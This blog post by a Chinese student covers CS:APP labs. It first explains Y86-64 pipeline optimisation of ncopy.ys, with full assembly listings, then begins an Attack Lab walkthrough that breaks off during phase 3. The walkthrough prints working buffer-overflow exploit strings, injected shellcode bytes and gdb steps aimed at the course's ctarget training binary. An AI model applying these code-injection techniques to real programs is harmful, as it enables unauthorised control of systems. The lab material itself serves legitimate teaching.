    iaddq $64, %rdi
    iaddq $64, %rsi
    iaddq $-8, %rdx
    # 循环结束条件判断
    # 注意此时无法使用之前类似的控制冒险优化技术,因为必须知道 rdx 的新值才能确定是否要继续拷贝
    # 而插入 nop 指令无益于降低 CPE,因为预测失败的情况只有最后才会出现,并导致 2 个气泡周期的惩罚
    # 但是如果使用 nop 指令,每次循环都会多出 1 个时钟周期
    jge loop_unrolling_8_way

仔细观察代码中 judge_and_write_num_x 中的语序,我们将原本位于后面的 rmmovq 指令插入到了 andq 设置条件码语句与 jle 判断语句之间,从而使得 jle 到达 Decode 解码阶段时,各指令阶段如下:

  • andq:Memory 访存阶段
  • rmovq:Execute 执行阶段
  • jle:Decode 解码阶段

此时,jle 可以立即使用正确的 M_Cnd,避免控制冒险,即在 Decode 解码阶段就可以知道是否需要跳转,避免了预测失败时的 2 个气泡周期的惩罚。

其他细节请参见代码注释。

现在循环体的部分已经搞定了,我们成功处理了 $\lfloor x / 8 \rfloor \times 8$ 的数据,对于剩下的数据,我们需要做额外的余数处理。

余数判断:平衡二叉树搜索

首先,我们思考一下整个余数处理的过程应该是怎么样的。

我们需要一段代码,类似于:

choose_where_to_jmp:
    if(cnd_for_x):
        jmp handle_reminder_x
    ...
handle_remainder_7:
    ...
handle_remainder_6:
    ...
    ...
handle_remainder_0:

这种处理结构的好处在于,对于任意余数 $r$,我们总能先分支跳转到对应的余数处理代码,然后顺序执行从 $r \sim 0$ 之间的所有判断,从而无需多次跳转。

那么问题来了,我们如何才能选择应当跳转到那个分支呢?最朴素的思想莫过于一个一个加过去:

handle_remainder:
    # 余数处理,朴素形态,起始 rdx 值为 -8 ~ -1
    iaddq $1, %rdx
    mrmovq 48(%rdi), %rbx
    je handle_remainder_7
    iaddq $1, %rdx
    mrmovq 40(%rdi), %rbx
    je handle_remainder_6
    iaddq $1, %rdx
    mrmovq 32(%rdi), %rbx
    je handle_remainder_5
    iaddq $1, %rdx
    mrmovq 24(%rdi), %rbx
    je handle_remainder_4
    iaddq $1, %rdx
    mrmovq 16(%rdi), %rbx
    je handle_remainder_3
    iaddq $1, %rdx
    mrmovq 8(%rdi), %rbx
    je handle_remainder_2
    iaddq $1, %rdx
    mrmovq (%rdi), %rbx
    je handle_remainder_1
    ret

注:这段代码中同样利用到了 “戳气泡” 的技术,即在 iaddq 设置条件码与 je 跳转语句中插入了一句 mrmovq 指令(虽然这更新了 rbx,但并不会设置条件码,所以跳转语句并不关心它),从而避免了预测失败惩罚。

但这无疑是十分低效的,回忆起我们在数算 / 计概中学到的 BST 二叉树搜索,以及先前章节学到过的二分代码的汇编表示,我们可以优化这个顺序判断的结构,使之对于任意余数,都只需要 3 次判断就能准确知道应当跳转到那个分支。同时要记得注意细节,减少不必要的加减操作与跳转操作:

handle_remainder:
    # 余数处理,采用平衡二叉树搜索的方式,使得平均判断次数为 3 次
    # -8 ~ -1 -> -4 ~ 3
    iaddq $4, %rdx
    # -4 ~ -1
    jl handle_remainder_0_to_3

handle_remainder_4_to_7:
    # 0 ~ 3 -> -2 ~ 1
    iaddq $-2, %rdx
    # -2 ~ -1
    jl handle_remainder_4_to_5

handle_remainder_6_to_7:
    # 0 ~ 1
    mrmovq 40(%rdi), %rbx
    je handle_remainder_6
    # 由于存在转发优先级,所以最新的指令优先级最高
    # 所以可以直接覆写 %rbx,无需切换寄存器/等待冒泡
    mrmovq 48(%rdi), %rbx
    jmp handle_remainder_7

handle_remainder_4_to_5:
    # -2 ~ -1 -> -1 ~ 0
    iaddq $1, %rdx
    mrmovq 32(%rdi), %rbx
    je handle_remainder_5
    mrmovq 24(%rdi), %rbx
    jmp handle_remainder_4

handle_remainder_0_to_3:
    # -4 ~ -1 -> -2 ~ 1
    iaddq $2, %rdx
    jl handle_remainder_0_to_1

handle_remainder_2_to_3:
    # 0 ~ 1
    mrmovq 8(%rdi), %rbx
    je handle_remainder_2
    mrmovq 16(%rdi), %rbx
    jmp handle_remainder_3

handle_remainder_0_to_1:
    # -2 ~ -1
    iaddq $1, %rdx
    mrmovq (%rdi), %rbx
    je handle_remainder_1
    # 对于余数为 0 的情况,直接结束,不需要再进行任何判断/跳转
    # 跳转到 Done 再 ret 会增加 CPE
    ret

具体余数处理:再戳一戳气泡

我们终于来到了最后的一个部分,即如何处理具体的余数?

回想在循环展开中介绍过的技术,再压榨压榨自己的脑子,思考一下示例代码中的判断流程:

Loop:
    mrmovq (%rdi), %r10	# read val from src...
    rmmovq %r10, (%rsi)	# ...and store it to dst
    andq %r10, %r10		# val <= 0?
    jle Npos		# if so, goto Npos:
    irmovq $1, %r10
    addq %r10, %rax		# count++

还记得为什么这段代码效率很低吗?因为其中有很多的气泡,我们列出来:

  • mrmovqrmmovq:这会导致数据冒险,在第二条 rmmovq 之前要插 1 个气泡,使得满足如下条件:

    • mrmovq 在访存 M 阶段
    • rmmovq 在译码 D 阶段

    这样才能通过转发正确的 m_valM 保证数据的正确性

  • mrmovqandq:这同样会导致数据冒险,在第二条 andq 之前要插入 1 个气泡,使得满足如下条件:

    • mrmovq 在访存 M 阶段
    • andq 在译码 D 阶段

    这样才能通过转发正确的 m_valM 保证数据的正确性

  • andqjle:这会导致控制冒险,在第二条 jle 之前要插入 1 个气泡,使得满足如下条件:

    • andq 在访存 M 阶段
    • jle 在译码 D 阶段

    这样才能通过转发正确的 M_cnd 以保证预测成功,避免预测失败带来的 2 个气泡惩罚

在上述过程中,所有的气泡其实都可以使用并不相关的其他有效指令替代,因而我们发现,可以交替使用 “戳气泡” 技术,从而降低 CPE:

handle_remainder_A_to_B:
    iaddq $1, %rdx # ①
    mrmovq (%rdi), %rbx # ②
    je handle_remainder_A # ③
handle_remainder_A:
    # 进入前已经正确加载数据到 %rbx 中,可以直接开始判断是否大于0
    andq %rbx, %rbx # ④
    rmmovq %rbx, 48(%rsi) # ⑤
    mrmovq 40(%rdi), %rbx # ⑥
    jle handle_remainder_6 # ⑦
    iaddq $1, %rax # 对应正数+1

以上这段代码就是最终的代码的结构了,其中完美贯彻了 “戳气泡” 的思想:

  • ①→③:插入 ②
  • ②→④:插入 ③
  • ④→⑦:插入 ⑤⑥

最终版本

请务必不要忘了先参照 PartB 修改 pipe-full.hcl 文件并构建,否则会导致 CPE<1 的离谱 Bug

如下就是我们代码的最终版本了:

#/* $begin ncopy-ys */
##################################################################
# ncopy.ys - Copy a src block of len words to dst.
# Return the number of positive words (>0) contained in src.
#
# Include your name and ID here.
# Arthals 2110306206@stu.pku.edu.cn
# Describe how and why you modified the baseline code.
# 1. 使用 8 路循环展开,一次性将 8 个数读入到寄存器中,使用不同的寄存器保证流水线满速运行,由于使用了不同的寄存器,所以不存在任何的数据冒险,也就不需要暂停,从而可以优化 CPE。
# 2. 8 路循环展开的第二个优点是余数处理的时候可以平衡地使用二叉树搜索,从而只需要 log2(8) = 3 次平均判断次数。
# 3. 循环体中,用了技巧在 andq 和 jle 之间插入了一条 rmmovq 指令,使得当设置条件码的指令到达 Memory 访存阶段时,jle 刚刚进入 Decode 解码阶段,从而可以立即使用正确的 M_Cnd,避免控制冒险,即在 Decode 解码阶段就可以知道是否需要跳转,避免了预测失败时的 2 个气泡周期的惩罚。
# 4. 余数处理部分交替使用了 3 中提到的技术与“戳气泡”技术来优化,避免加载/使用冒险,即在 mrmovq 和 andq 设置条件码之间插入一条指令(je)使得当 mrmovq 处于访存 Memory 阶段时,具体余数处理部分的 andq 进入译码 Decode 阶段,此时即可以使用转发技术来避免加载/使用冒险,从而避免暂停/气泡,优化 CPE。
# 5. 使用了一些其他的细节技术,如基于 f_pc 的转发优先级的寄存器覆写、对于余数为 0 的情况特殊剪枝等,进一步优化了 CPE。
# ——————————————
# 本地测评参数:
# ncopy length = 875 bytes
# 68/68 pass correctness test
# Average CPE     7.49
# Score   60.0/60.0
##################################################################
# Do not modify this portion
# Function prologue.
# %rdi = src, %rsi = dst, %rdx = len
ncopy:

##################################################################
    # 8路循环展开,优点是余数处理的时候可以平衡地使用二叉树搜索,从而只需要3次平均判断次数
    iaddq $-8, %rdx
    jl handle_remainder
    # 进行8路循环展开,一次性将8个数读入到寄存器中,使用不同的寄存器保证流水线满速运行
    # 由于使用了不同的寄存器,所以不存在任何的数据冒险,也就不需要暂停,从而可以优化 CPE
loop_unrolling_8_way:
    mrmovq (%rdi), %r8
    mrmovq 8(%rdi), %r9
    mrmovq 16(%rdi), %r10
    mrmovq 24(%rdi), %r11
    mrmovq 32(%rdi), %r12
    mrmovq 40(%rdi), %r13
    mrmovq 48(%rdi), %r14
    mrmovq 56(%rdi), %rcx

    # 判断这8个读入的数据是否大于0,大于0则将其写入到dst中,同时计数器加1
judge_and_write_num_0:
    # 判断第一个数是否大于0
    andq %r8, %r8
    # 通过将 rmmovq 指令插入在读取并设置条件码的步骤与条件跳转 jle 之间
    # 使得当设置条件码的指令到达 Memory 访存阶段时,jle 刚刚进入 Decode 解码阶段
    # 从而可以立即使用正确的 M_Cnd,避免控制冒险,即在 Decode 解码阶段就可以知道是否需要跳转
    # 避免了预测失败时的2个气泡周期的惩罚
    rmmovq %r8, (%rsi)
    jle judge_and_write_num_1
    iaddq $1, %rax
judge_and_write_num_1:
    andq %r9, %r9
    rmmovq %r9, 8(%rsi)
    jle judge_and_write_num_2
    iaddq $1, %rax
judge_and_write_num_2:
    andq %r10, %r10
    rmmovq %r10, 16(%rsi)
    jle judge_and_write_num_3
    iaddq $1, %rax
judge_and_write_num_3:
    andq %r11, %r11
    rmmovq %r11, 24(%rsi)
    jle judge_and_write_num_4
    iaddq $1, %rax
judge_and_write_num_4:
    andq %r12, %r12
    rmmovq %r12, 32(%rsi)
    jle judge_and_write_num_5
    iaddq $1, %rax
judge_and_write_num_5:
    andq %r13, %r13
    rmmovq %r13, 40(%rsi)
    jle judge_and_write_num_6
    iaddq $1, %rax
judge_and_write_num_6:
    andq %r14, %r14
    rmmovq %r14, 48(%rsi)
    jle judge_and_write_num_7
    iaddq $1, %rax
judge_and_write_num_7:
    andq %rcx, %rcx
    rmmovq %rcx, 56(%rsi)
    jle update_expr
    iaddq $1, %rax
update_expr:
    # 更新循环参数
    # rdi, rsi 都可以改,因为本次循环中的数据已经被写入到了 dst 中,且完成了正数判断
    # 所以不会再次使用,只需待循环结束时再去处理余数
    iaddq $64, %rdi
    iaddq $64, %rsi
    iaddq $-8, %rdx
    # 循环结束条件判断
    # 注意此时无法使用之前类似的控制冒险优化技术,因为必须知道 rdx 的新值才能确定是否要继续拷贝
    # 而插入 nop 指令无益于降低 CPE,因为预测失败的情况只有最后才会出现,并导致 2 个气泡周期的惩罚
    # 但是如果使用 nop 指令,每次循环都会多出 1 个时钟周期
    jge loop_unrolling_8_way

handle_remainder:
    # 余数处理,采用平衡二叉树搜索的方式,使得平均判断次数为 3 次
    # -8 ~ -1 -> -4 ~ 3
    iaddq $4, %rdx
    # -4 ~ -1
    jl handle_remainder_0_to_3

handle_remainder_4_to_7:
    # 0~3 -> -2 ~ 1
    iaddq $-2, %rdx
    # -2 ~ -1
    jl handle_remainder_4_to_5

handle_remainder_6_to_7:
    # 0 ~ 1
    # 开始进入到具体余数的处理,此时已经可以开始使用之前的技术来避免暂停,优化 CPE
    # 正常的过程是:
    # 1.判断设置状态码
    # 2.条件跳转(1个气泡的暂停)
    # 3.加载数据到寄存器
    # ----
    # 优化后的过程是
    # 1.判断设置状态码
    # 2.加载数据到寄存器
    # 3.条件跳转
    # 这可以使得 iaddq 处于访存 Memory 阶段时,je 已经获得了正确的 M_cnd,从而避免预测失败
    # 同时,可以交替使用“戳气泡”技术来优化数据冒险,即在 mrmovq 和 andq 设置条件码之间插入一条指令(je)
    # 使得当 mrmovq 处于访存 Memory 阶段时,具体余数处理部分的 andq 进入译码 Decode 阶段
    # 此时即可以使用转发技术来避免加载/使用冒险,从而避免暂停/气泡,优化 CPE
    mrmovq 40(%rdi), %rbx
    je handle_remainder_6
    # 由于存在转发优先级,所以最新的指令优先级最高
    # 所以可以直接覆写 %rbx,无需切换寄存器/等待冒泡
    mrmovq 48(%rdi), %rbx
    jmp handle_remainder_7

handle_remainder_4_to_5:
    # -2~-1 -> -1~0
    iaddq $1, %rdx
    mrmovq 32(%rdi), %rbx
    je handle_remainder_5
    mrmovq 24(%rdi), %rbx
    jmp handle_remainder_4

handle_remainder_0_to_3:
    # -4~-1 -> -2 ~ 1
    iaddq $2, %rdx
    jl handle_remainder_0_to_1

handle_remainder_2_to_3:
    # 0~1
    mrmovq 8(%rdi), %rbx
    je handle_remainder_2
    mrmovq 16(%rdi), %rbx
    jmp handle_remainder_3

handle_remainder_0_to_1:
    # -2 ~ -1
    iaddq $1, %rdx
    mrmovq (%rdi), %rbx
    je handle_remainder_1
    # 对于余数为 0 的情况,直接结束,不需要再进行任何判断/跳转
    # 跳转到 Done 再 ret 会增加 CPE
    ret

handle_remainder_7:
    # 进入前已经正确加载数据到 %rbx 中,可以直接开始判断是否大于0
    andq %rbx, %rbx
    rmmovq %rbx, 48(%rsi)
    mrmovq 40(%rdi), %rbx
    # 这里同样使用了戳气泡的技术
    jle handle_remainder_6
    iaddq $1, %rax
handle_remainder_6:
    andq %rbx, %rbx
    rmmovq %rbx, 40(%rsi)
    mrmovq 32(%rdi), %rbx
    jle handle_remainder_5
    iaddq $1, %rax
handle_remainder_5:
    andq %rbx, %rbx
    rmmovq %rbx, 32(%rsi)
    mrmovq 24(%rdi), %rbx
    jle handle_remainder_4
    iaddq $1, %rax
handle_remainder_4:
    andq %rbx, %rbx
    rmmovq %rbx, 24(%rsi)
    mrmovq 16(%rdi), %rbx
    jle handle_remainder_3
    iaddq $1, %rax
handle_remainder_3:
    andq %rbx, %rbx
    rmmovq %rbx, 16(%rsi)
    mrmovq 8(%rdi), %rbx
    jle handle_remainder_2
    iaddq $1, %rax
handle_remainder_2:
    andq %rbx, %rbx
    rmmovq %rbx, 8(%rsi)
    mrmovq (%rdi), %rbx
    jle handle_remainder_1
    iaddq $1, %rax
handle_remainder_1:
    andq %rbx, %rbx
    rmmovq %rbx, (%rsi)
    jle Done
    iaddq $1, %rax
##################################################################
# Do not modify the following section of code
# Function epilogue.
Done:
    ret
##################################################################
# Keep the following label at the end of your function
End:
#/* $end ncopy-ys */

注意 label 名不能以数字开头,否则会报错。

最终的 CPE 为 7.49,成功收获满分!

其他版本

作为文章的结尾,再附上一个 9 路循环的版本以供参考,此版本亦可拿到 CPE 7.49 的满分:

注意这里使用了三叉树而不是二叉树优化,这理论上是更优的。因为我们总可以设置一次条件码继而直接使用 jl/je/jg

另外注释中的加权性能分析是随便说的,不保证正确性。

#/* $begin ncopy-ys */
##################################################################
# ncopy.ys - Copy a src block of len words to dst.
# Return the number of positive words (>0) contained in src.
#
# Include your name and ID here.
# Arthals 2110306206@stu.pku.edu.cn
# Describe how and why you modified the baseline code.
# ——————————————
# 本地测评参数:
# ncopy length = 967 bytes
# 68/68 pass correctness test
# Average CPE     7.49
# Score   60.0/60.0
##################################################################
# Do not modify this portion
# Function prologue.
# %rdi = src, %rsi = dst, %rdx = len
ncopy:

##################################################################
    # 9路循环展开,平均期望劣于8路,但是在数组范围限制在 1~64 时优于8路循环展开
    # 加权性能分析(可能是错的!),在下式中,每对乘法第一个数代表由于判断带来的暂停气泡周期数,第二个数代表此类余数的个数
    # 小于号左侧为 9 路循环展开的 CPE,右侧为 8 路循环展开的平均 CPE
    # (2*8[余1]+3*14[余0、2]+4*42[余3~9]-3[少一次循环判断减少的周期数])/64 = 3.48 < 1+2.5 = 3.5
    # 平均期望劣于8路:把 -3 删掉,则左式 CPE = 3.53
    iaddq $-9, %rdx
    jl handle_remainder
    # 进行9路展开,一次性将9个数加载到寄存器中,使用不同的寄存器保证流水线满速运行
loop_unrolling_9_way:
    mrmovq (%rdi), %r8
    mrmovq 8(%rdi), %r9
    mrmovq 16(%rdi), %r10
    mrmovq 24(%rdi), %r11
    mrmovq 32(%rdi), %r12
    mrmovq 40(%rdi), %r13
    mrmovq 48(%rdi), %r14
    mrmovq 56(%rdi), %rcx
    mrmovq 64(%rdi), %rbx

    # 判断这9个读入的数据是否大于0,大于0则将其写入到dst中,同时计数器加1
judge_and_write_num_0:
    # 判断第一个数是否大于0
    andq %r8, %r8
    # 通过将 rmmovq 指令插入在读取并设置条件码的步骤与条件跳转 jle 之间
    # 使得当设置条件码的指令到达 Memory 访存阶段时,jle 刚刚进入 Decode 解码阶段
    # 从而可以立即使用正确的 M_Cnd,避免控制冒险,即在 Decode 解码阶段就可以知道是否需要跳转
    # 避免了预测失败时的2个气泡周期的惩罚
    rmmovq %r8, (%rsi)
    jle judge_and_write_num_1
    iaddq $1, %rax
judge_and_write_num_1:
    andq %r9, %r9
    rmmovq %r9, 8(%rsi)
    jle judge_and_write_num_2
    iaddq $1, %rax
judge_and_write_num_2:
    andq %r10, %r10
    rmmovq %r10, 16(%rsi)
    jle judge_and_write_num_3
    iaddq $1, %rax
judge_and_write_num_3:
    andq %r11, %r11
    rmmovq %r11, 24(%rsi)
    jle judge_and_write_num_4
    iaddq $1, %rax
judge_and_write_num_4:
    andq %r12, %r12
    rmmovq %r12, 32(%rsi)
    jle judge_and_write_num_5
    iaddq $1, %rax
judge_and_write_num_5:
    andq %r13, %r13
    rmmovq %r13, 40(%rsi)
    jle judge_and_write_num_6
    iaddq $1, %rax
judge_and_write_num_6:
    andq %r14, %r14
    rmmovq %r14, 48(%rsi)
    jle judge_and_write_num_7
    iaddq $1, %rax
judge_and_write_num_7:
    andq %rcx, %rcx
    rmmovq %rcx, 56(%rsi)
    jle judge_and_write_num_8
    iaddq $1, %rax
judge_and_write_num_8:
    andq %rbx, %rbx
    rmmovq %rbx, 64(%rsi)
    jle update_expr
    iaddq $1, %rax
update_expr:
    # 更新循环参数
    # rdi, rsi 都可以改,因为本次循环中的数据已经被写入到了 dst 中,且完成了正数判断
    # 所以不会再次使用,只需待循环结束时再去处理余数
    iaddq $72, %rdi
    iaddq $72, %rsi
    iaddq $-9, %rdx
    # 循环结束条件判断
    # 注意此时无法使用之前类似的控制冒险优化技术,因为必须知道 rdx 的新值才能确定是否要继续拷贝
    # 而插入 nop 指令无益于降低 CPE,因为预测失败的情况只有最后才会出现,并导致 2 个气泡周期的惩罚
    # 但是如果使用 nop 指令,每次循环都会多出 1 个时钟周期
    jge loop_unrolling_9_way

handle_remainder:
    # 余数处理,采用三分法优化
    # 加权性能分析:在下式中,每对乘法第一个数代表由于判断带来的暂停气泡周期数,第二个数代表此类余数的个数
    # 小于号左侧为 9 路循环展开的 CPE,右侧为 8 路循环展开的平均 CPE
    # (2*8[余1]+3*14[余0、2]+4*42[余3~9]-3[少一次循环判断减少的周期数])/64 = 3.48 < 1+2.5 = 3.5
    # 平均期望劣于8路:把 -3 删掉,则左式 CPE = 3.53
    # 注意到 64/9 余 1,所以我们优先处理小余数的情况,从而针对性剪枝,优化 CPE
    iaddq $6, %rdx
    # 0~2
    jl handle_remainder_0_to_2

handle_remainder_3_to_8:
    iaddq $-3, %rdx
    jl handle_remainder_3_to_5

    # 开始进入到具体余数的处理,此时已经可以开始使用之前的技术来避免暂停,优化 CPE
    # 正常的过程是:
    # 1.判断设置状态码
    # 2.条件跳转(1个气泡的暂停)
    # 3.加载数据到寄存器
    # 优化后的过程是
    # 1.判断设置状态码
    # 2.加载数据到寄存器
    # 3.条件跳转
    # 同时,可以交替使用“戳气泡”技术来优化数据冒险,即在 mrmovq 和 andq 设置条件码之间插入一条指令(jle)
    # 使得当 mrmovq 处于访存 M 阶段时,andq 进入译码 D 阶段
    # 此时即可以使用转发技术来避免加载/使用冒险,从而避免暂停/气泡,优化 CPE
handle_remainder_6_to_8:
    iaddq $-1, %rdx
    mrmovq 40(%rdi), %rbx
    jl handle_remainder_6
    mrmovq 48(%rdi), %rbx
    je handle_remainder_7
    mrmovq 56(%rdi), %rbx
    jg handle_remainder_8

handle_remainder_3_to_5:
    iaddq $2, %rdx
    mrmovq 16(%rdi), %rbx
    jl handle_remainder_3
    mrmovq 24(%rdi), %rbx
    je handle_remainder_4
    mrmovq 32(%rdi), %rbx
    jg handle_remainder_5

handle_remainder_0_to_2:
    iaddq $2, %rdx
    mrmovq (%rdi), %rbx
    je handle_remainder_1
    mrmovq 8(%rdi), %rbx
    jg handle_remainder_2
    ret

handle_remainder_8:
    # 此时已经正确读取数据到 rbx 中,可以开始判断是否大于0
    andq %rbx, %rbx
    rmmovq %rbx, 56(%rsi)
    mrmovq 48(%rdi), %rbx
    jle handle_remainder_7
    iaddq $1, %rax
handle_remainder_7:
    andq %rbx, %rbx
    rmmovq %rbx, 48(%rsi)
    mrmovq 40(%rdi), %rbx
    jle handle_remainder_6
    iaddq $1, %rax
handle_remainder_6:
    andq %rbx, %rbx
    rmmovq %rbx, 40(%rsi)
    mrmovq 32(%rdi), %rbx
    jle handle_remainder_5
    iaddq $1, %rax
handle_remainder_5:
    andq %rbx, %rbx
    rmmovq %rbx, 32(%rsi)
    mrmovq 24(%rdi), %rbx
    jle handle_remainder_4
    iaddq $1, %rax
handle_remainder_4:
    andq %rbx, %rbx
    rmmovq %rbx, 24(%rsi)
    mrmovq 16(%rdi), %rbx
    jle handle_remainder_3
    iaddq $1, %rax
handle_remainder_3:
    andq %rbx, %rbx
    rmmovq %rbx, 16(%rsi)
    mrmovq 8(%rdi), %rbx
    jle handle_remainder_2
    iaddq $1, %rax
handle_remainder_2:
    andq %rbx, %rbx
    rmmovq %rbx, 8(%rsi)
    mrmovq (%rdi), %rbx
    jle handle_remainder_1
    iaddq $1, %rax
handle_remainder_1:
    andq %rbx, %rbx
    rmmovq %rbx, (%rsi)
    jle Done
    iaddq $1, %rax
##################################################################
# Do not modify the following section of code
# Function epilogue.
Done:
    ret
##################################################################
# Keep the following label at the end of your function
End:
#/* $end ncopy-ys */

Other

小班课学到的其他细节

如何理解转发?

转发将一条指令的结果或者一个寄存器的信息直接转发到先前的阶段,从而可以用于该时期的计算或者替代现有的数据作为下一次时钟上升沿的输入。

为什么 具体余数处理:再戳一戳气泡 一节中,使用的是 m_valM 而不是 W_valM

参考上一条,在 mrmovq 的阶段中,m_valM 已经被正确设置,此时已经可以尽早转发替代现有的数据,从而避免暂停。

暂停和气泡的区别?

暂停:插入一个气泡,但是原有指令的状态保留。用于解决各种冒险

气泡:等价于一条 nop 指令,在 ret 之后会插入三个气泡,即三条空指令。这会导致先前各个阶段的状态 / 寄存器清空。

一些别的我觉得可能有用的教程

按照树洞所说,如果你不动 HCL,最优分数应该就是 7.49,任何更低的 CPE 都是因为改了 HCL,我在 Github 和别的地方找到了一些可能有用的链接,在此附上。

#3453283

#15003353 1 年前 2022-04-20 12:57

[洞主] 对了,歪个楼,archlab 的那个操作其实很简单。在第三个 lab 判定数组里面数字与 0 的关系时,在实现成二叉树的结构之后,只需要利用异或操作,两个两个地对数组里面的数字进行计数,就可以在这两个数字符号相反的时候节省一次额外判定的时间,从而很轻松地拿到满分。如果学过数字逻辑的同学应该能意识到这个就是半加器的原理。

💾

更适合北大宝宝体质的 Attack Lab 踩坑记

2023年10月18日 18:49

[!CAUTION]

致各位同学:本笔记的撰写目的是用作参考,请勿直接抄袭,否则后果自负。

我的推荐做法是,你可以阅读我的博文后了解都有哪些坑,但自己实现的时候千万不要看我的代码,避免抄袭风险。

写在前面:这篇是我第一篇 lab 笔记博文,写的比较粗糙,请见谅。

Phase 1

首先,进行反编译以得到汇编代码:

objdump -d ctarget > ctarget.s

查找 getBuf() 函数确定调用分配的空间:

0000000000401e5a <getbuf>:
  401e5a:	f3 0f 1e fa          	endbr64
  401e5e:	48 83 ec 18          	sub    $0x18,%rsp
  401e62:	48 89 e7             	mov    %rsp,%rdi
  401e65:	e8 cd 03 00 00       	call   402237 <Gets>
  401e6a:	b8 01 00 00 00       	mov    $0x1,%eax
  401e6f:	48 83 c4 18          	add    $0x18,%rsp
  401e73:	c3                   	ret

发现分配了 0x18 = 24 的空间地址

继续查找 touch1 函数所在地址:

0000000000401f24 <touch1>:
  401f24:	f3 0f 1e fa          	endbr64
  401f28:	50                   	push   %rax
  401f29:	58                   	pop    %rax
  401f2a:	48 83 ec 08          	sub    $0x8,%rsp
  401f2e:	c7 05 e4 55 00 00 01 	movl   $0x1,0x55e4(%rip)        # 40751c <vlevel>
  401f35:	00 00 00
  401f38:	48 8d 3d d7 23 00 00 	lea    0x23d7(%rip),%rdi        # 404316 <_IO_stdin_used+0x316>
  401f3f:	e8 6c f3 ff ff       	call   4012b0 <puts@plt>
  401f44:	bf 01 00 00 00       	mov    $0x1,%edi
  401f49:	e8 5b 05 00 00       	call   4024a9 <validate>
  401f4e:	bf 00 00 00 00       	mov    $0x0,%edi
  401f53:	e8 b8 f4 ff ff       	call   401410 <exit@plt>

发现是在 0x401f24 处。

于是得出输入字符串(注意每一行结尾似乎都应该还有一个空格):

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
24 1f 40 00

编码成 raw 字符串并测试(即将上面的内容根据 ASCII 码翻译为真实输入):

./hex2raw < p1.txt > ans1.txt
./ctarget -i ans1.txt

通过:

Cookie: 0x11a67610
Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!

Phase 2

首先,启动 gdb 并设置断点以进行调试。

因为我们的注入代码会放到缓冲区,而我们要进行 ROP 攻击,就需要知道注入的攻击代码的存放地址,也即缓冲区起始地址。

gdb ctarget
b getbuf
r
layout asm
layout regs

待到 sub $0x18,%rsp 这条执行完后,也就可以获得当前的栈指针,即缓冲区起始地址 0x55634688

Cleanshot-2023-10-17-at-16.24.35

然后,编写我们的代码,储存为 p2.s

movq $0x11a67610,%rdi
pushq $0x401f58
ret

这段代码的效果:

  1. 立即数 $0x11a67610 设置为 %rdi 寄存器的值,也即第一个参数
  2. 立即数 $0x401f58 压入栈中
  3. 返回

为什么要这么写?可以参见下图:

phase2

然后依次运行

gcc -c p2.s # 编译
objdump -d p2.o > p2.byte # 翻译为字节码

得到 p2.byte


p2.o:     file format elf64-x86-64


Disasm of section .text:

0000000000000000 <.text>:
   0:	48 c7 c7 10 76 a6 11 	mov    $0x11a67610,%rdi
   7:	68 58 1f 40 00       	push   $0x401f58
   c:	c3                   	ret

组合我们的代码:

48 c7 c7 10 76 a6 11 68
58 1f 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
88 46 63 55

依次运行:

./hex2raw < p2.txt > p2a.txt
./ctarget -i p2a.txt

于是大功告成!

Cookie: 0x11a67610
Touch2!: You called touch2(0x11a67610)
Valid solution for level 2 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!

Phase 3

简单地翻译一下 hexmatch

  • 首先分配一个长度为 110 的字符数组,然后再这 110 长度的数组中,随机选择一个小于 100 的起始位置 s
  • 将不能修改的 cookie(也就是 hexmatch 中的 val)按照 hex 十六进制下,首先转为对应的 ASCII 码,然后复制 8 个到 s 起始的 8 个字节。
  • 比较 s 和你修改后,存在 %rdi 的参数 sval(字符数组首地址),比较 9 个字符(含结尾 \0

所以,我们意识到:

  • 我们存在缓冲区的东西可能被清除
  • 我们无法确定 s 的起始位置,也就无法修改它,只能修改 sval

好,我们首先类似 phase 2 的做法,得到了如下的代码 p3.txt,它实现:

  • 溢出 getbuf 分配的 24 字节缓冲区 4 个字节,对于没有使用到的字节,使用 3f 填充加以区分
  • 首先进行第一次 ret,跳转到我们的注入代码
  • 修改 rdi 的值为 0x11a67610(也就是我们的 Cookie)
  • 接着 pushq 0x40207dtouch3 的地址)
  • ret,从而跳转进入 touch3
48 c7 c7 10 76 a6 11 68
7d 20 40 00 c3 3f 3f 3f
3f 3f 3f 3f 3f 3f 3f 3f
88 46 63 55

类似地,执行

./hex2raw < p3.txt > p3a.txt

获得输入的字符串

然后打开 gdb,依次输入:

gdb ctarget
b touch3
set args -i p3a.txt
r
layout asm
layout regs

成功进入 touch3 后,我们首先执行

x/20x 0x55634688

得到

(gdb) x/20x 0x55634688
0x55634688:     0x10c7c748      0x6811a676      0x0040207d      0x3f3f3fc3
0x55634698:     0x3f3f3f3f      0x3f3f3f3f      0x00000000      0x00000000
0x556346a8:     0x00000009      0x00000000      0x00402818      0x00000000
0x556346b8:     0x00000000      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0x556346c8:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4

可以发现此时我们放在缓冲区的内容还没有被修改,继续 si,直到进入 hexmatch 函数,继续执行完成 sub $0x88,%rsp,再次执行上述查看缓冲区的命令,得到

(gdb) x/20x 0x55634688
0x55634688:     0x00404247      0x00000000      0x00000000      0x00000000
0x55634698:     0x0040209d      0x00000000      0x00000000      0x00000000
0x556346a8:     0x00000009      0x00000000      0x00402818      0x00000000
0x556346b8:     0x00000000      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0x556346c8:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4

此时发现我们的放在缓冲区的东西全数被覆写,从而我们得知不能再在缓冲区存放我们的字符数组,于是只能另寻他处。

注意到在 0x556346b8 这个地址开始,似乎存在一些多余的 0,于是一个很自然的想法是,我们能否将字符数组覆写到这里。

虽然 phase2 中我们知道不能再在溢出的 4 个字节(即第一次控制的 ret)后再写什么,因为会影响原有函数的帧栈的一些东西,但是我们如果保存原本存放的东西不变,只覆写 0x556346b8 的这些看上去不太有用的 0,也许就可能有效?

于是我们首先将 cookie 转为 ascii 码 31 31 61 36 37 36 31 30,然后控制我们的输入,除了第一次 ret 需要更改的四个字节外,保持原有字节不动,直至溢出至 0x556346b8 ,才再次加入我们需要覆写的字节,并调整存在 %rdi 中的数值为 0x556346b8 ,于是我们得到我们实际应当输入的字节码:

